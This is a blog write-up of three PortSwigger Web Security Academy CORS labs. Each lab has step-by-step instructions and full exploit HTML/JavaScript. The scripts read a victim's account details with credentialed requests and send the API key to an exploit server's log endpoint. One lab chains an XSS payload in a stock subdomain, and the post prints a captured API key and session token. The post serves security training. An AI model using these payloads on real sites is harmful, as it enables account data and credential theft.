Post

CORS - PortSwigger

Posted Updated
By karim moftah
3 min read
CORS - PortSwigger


Table of Contents


CORS vulnerability with basic origin reflection

Goal : craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server.

  • log in and access your account page.
  • I saw this endpoint /accountDetails in the profile page source.

cors

  • go to /accountDetails, and the observe the Access-Control-Allow-Credentials header.

  • Send the request to Burp Repeater, and resubmit it with the added header:

    1

    Origin: test.com

  • Observe that the origin is reflected in the Access-Control-Allow-Origin header.

cors

  • In the browser, go to the exploit server and enter the following HTML

    1
2
3
4
5
6
7
8
9
10
11
12

    <script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<your-lab-url>/accountDetails',true);
req.withCredentials = true;
req.send();
  
function reqListener() {
   location='<your-exploit-server>/log?key='+this.responseText;
};
  
</script>

  • Click View exploit. Observe that the exploit works - you have landed on the log page and your API key is in the URL.

  • Go back to the exploit server and click Deliver exploit to victim.

  • Click Access log, retrieve and submit the victim’s API key to complete the lab.

1

{  "username": "administrator",  "email": "",  "apikey": "SaCAyGSHgJD1QifqVNXAKr82XZKAra7S",  "sessions": [    "zLW0oQ69tCRLl2Dw3ZOu34JMgMPRa10k"  ]}



CORS vulnerability with trusted null origin

Goal: craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server.

  • log in and access your account page.

  • go to /accountDetails, and the observe the Access-Control-Allow-Credentials header.

  • Send the request to Burp Repeater, and resubmit it with the added header:

    1

    Origin: test.com

  • notice that no thing happened with the Access-Control-Allow-Origin header. this means it performs whitelist checking on the provided origin

  • resubmit it with the null value Origin: null

  • Observe that the origin is reflected in the Access-Control-Allow-Origin header.

cors

  • In the browser, go to the exploit server and enter the following HTML

    1
2
3
4
5
6
7
8
9
10
11

    <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<your-lab-url>/accountDetails',true);
req.withCredentials = true;
req.send();
  
function reqListener() {
location='<your-exploit-server>/log?key='+this.responseText;
};
</script>"></iframe>

    the exploit exists in sandbox iframe to be sent from null origin

  • Click View exploit. Observe that the exploit works - you have landed on the log page and your API key is in the URL.
  • Go back to the exploit server and click Deliver exploit to victim.
  • Click Access log, retrieve and submit the victim’s API key to complete the lab.



CORS vulnerability with trusted insecure protocols

Goal: craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server.

  • log in and access your account page.

  • go to /accountDetails, and the observe the Access-Control-Allow-Credentials header.

  • Send the request to Burp Repeater, and resubmit it with the added header:

    1
2
3

    Origin: test.com 
OR
Origin: null

  • notice that no thing happened with the Access-Control-Allow-Origin header. this means it performs whitelist checking on the provided origin

  • go to any product and click check stock , note that it responds from a stock subdomain

  • write this subdomain in the Origin header

  • Observe that the origin is reflected in the Access-Control-Allow-Origin header

cors


  • now to exploit the CORS misconfiguration we need to find XSS in the stock subdomain or any other one

  • Observe the two parameters in the stock subdomain , note that the productID parameter is vulnerable to XSS

    1

    http://stock.<your-lab-url>.web-security-academy.net/?productId=1%3cscript%3ealert(1)%3c%2fscript%3e2&storeId=2


cors


  • now with CORS+XSS we can get the administrator api key by sending a request to thestock subdomain with the CORS exploit in the productID parameter
  • go to the exploit server and enter the following HTML
1
2
3

<script>
    document.location="http://stock.<your-lab-url>.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://.<your-lab-url>.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-<your-exploit-url>.web-security-academy.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
  • Click View exploit. Observe that the exploit works - you have landed on the log page and your API key is in the URL.
  • Go back to the exploit server and click Deliver exploit to victim.
  • Click Access log, retrieve and submit the victim’s API key to complete the lab.
PortSwigger
PortSwigger writeup penetration testing CORS
This post is licensed under CC BY 4.0 by the author.